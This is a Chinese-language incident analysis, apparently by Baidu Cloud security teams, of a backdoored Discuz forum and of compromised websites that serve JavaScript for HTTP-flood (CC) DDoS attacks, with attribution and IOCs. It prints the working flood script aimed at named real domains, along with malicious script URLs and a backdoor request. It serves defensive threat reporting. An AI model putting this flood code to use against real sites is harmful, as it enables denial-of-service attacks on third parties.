Author: 百度雲安全天網團隊 百度安全攻防實驗室 百度雲安全雲端防護團隊

0x00 異常挖掘與回溯

---

11月13日，百度雲安全天網系統，透過數十TB的日誌挖掘，發現了安全寶某重點客戶網站上的異常行為。之後我們的分析人員跟進，發現這是一起針對安全寶某重點客戶的持續攻擊。最終在客戶系統上放置了Web後門。

該Web後門的通訊如下：

POST /uc_server/data/logs/20140708.php?v=1a HTTP/1.1
Host: bbs.xxxxx.com
Referer: http://bbs.xxxxx.com/uc_server/data/logs/20140708.php?v=1a
User-Agent: Sogou
Content-Length: 60

從通訊流量上看，並未觸發任何報警。同時，客戶的日誌裡也並未儲存http response的資料。

天網系統中的諦聽模組透過對網站的訪問行為進行建模，透過每個被防護的網站日誌訓練出這個網站特有的訪問模型。包括網站引數的模型，網站訪問路徑的模型，網站訪問session的模型。駭客這次的訪問行為觸發了網站訪問路徑模型的異常。該模型中透過每個路徑訪問的頻度廣度和路徑之間的訪問關係等feature，訓練出針對每個網站特定的路徑檢視。

我們在系統中對該客戶的所有歷史日誌進行了回溯，發現該駭客在9月24日就已經對該客戶展開了嘗試性的攻擊。

透過進一步的分析，我們發現，該攻擊者修改了Discuz系統的class_core.php。在該class_core.php中新增的程式碼如下：

從該程式碼中，我們可以做出以下結論：

1. 這次攻擊不是小範圍的針對單個站點的攻擊，而是攻擊了多個站點
2. 該程式碼中並未指定特定的CC攻擊的目標，而是透過Location統一跳轉到http://file.lbgoo.com/file_120/37/ver.php，由該url指定最終的攻擊目標。

0x01 影響確認和攻擊程式碼

---

我們從CC的攻擊程式碼中提取了以下特徵fuwuqibeiheikeruqin，在現有的網頁情報庫中搜尋，發現以下的連結地址：

http://www.eoeandroid.com/forum.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan

判斷eoeandroid也被這樣攻擊過。

11月20日，http://file.lbgoo.com/file_120/37/ver.php請求被重定向到http://www.eoeandroid.com/forum.php?，11月20日發現eoeandroid已經503了。該攻擊手法被進一步確認。

我們又對該程式碼中提及到的php100.com,www.dm123.cn和12edu.com進行訪問。發現如下：

以dm123.cn為例：

顯然該網站被利用來做CC攻擊。

同時我們針對以上網站掛CC攻擊的js進行了分析，發現有三種:

1. dm123.cn中，直接在dm123網站上掛js，指令碼路徑如下:
   http://www.dm123.cn/gd.js
2. php100.com中，託管在SAE上的攻擊指令碼，指令碼路徑如下:
   http://jsddos.sinaapp.com/ddos.js
3. 12edu.com中，透過api介面動態獲得要攻擊的網站，更加難以定位:
   http://www.12edu.com/api.php?op=count&id=34380&modelid=1

以上三種方式，從掃描器檢測的角度來看，複雜度逐漸增大。第一種情況下，是直接檢測本域下的js。第二種則需要檢測外鏈js，檢測量大大增大了。而第三種則是在已有的js裡面沒有攻擊程式碼。攻擊的程式碼是透過api介面動態獲得的。

攻擊用的js程式碼如下：

#!js
function imgflyygffgdsddfgd() {
var TARGET = 'www.hanyouwang.com'
var URI = '/index.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflyygffgdsddfgd, 0.1)
function imgflyygffhghddfgd() {
var TARGET = 'www.weshequ.com'
var URI = '/Search/v-wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflyygffhghddfgd, 0.1)

被攻擊域名包括重要政府網站和國家級新聞媒體

0x02 身份確認

---

透過域名的相似度，我們在現有的網頁情報庫中發現瞭如下域名：

• 部落格：http://jsddos.blog.163.com/
• 論壇：http://www.jsddos.com/

在163部落格上可以看到，該團隊名 ddos Js團隊，QQ 1551227222

在網頁情報庫中查詢該QQ，可以發現http://www.mspycn.com/about.html

看來除了賣ddos的服務，還在賣手機監聽軟體的服務

對該域名的whois進行查詢，如下：

從我們發現該攻擊到發稿前，該駭客做了如下的事情:

1. 修改了http://file.lbgoo.com/file_120/37/ver.php的指向
2. Php100.com已經不再受影響

0x03 後續

---

我們有理由相信，這是一個在不斷進化的地下駭客團體。透過更加隱蔽的手法進行CC攻擊掛馬。該問題的影響範圍目前我們還在進一步確認。歡迎業內同仁繼續跟進分析。

如果你想檢視自己的網站是否受影響，有兩個步驟：

1. 開啟網站，隨機訪問幾個頁面，檢視下面是否會發起連續的對其他網站的請求
2. 檢視是否會發起請求：http://file.lbgoo.com/file_120/37/ver.php

我們從該攻擊中提取了以下資訊作為攻擊情報或者IOC：

http://file.lbgoo.com/file_120/37/ver.php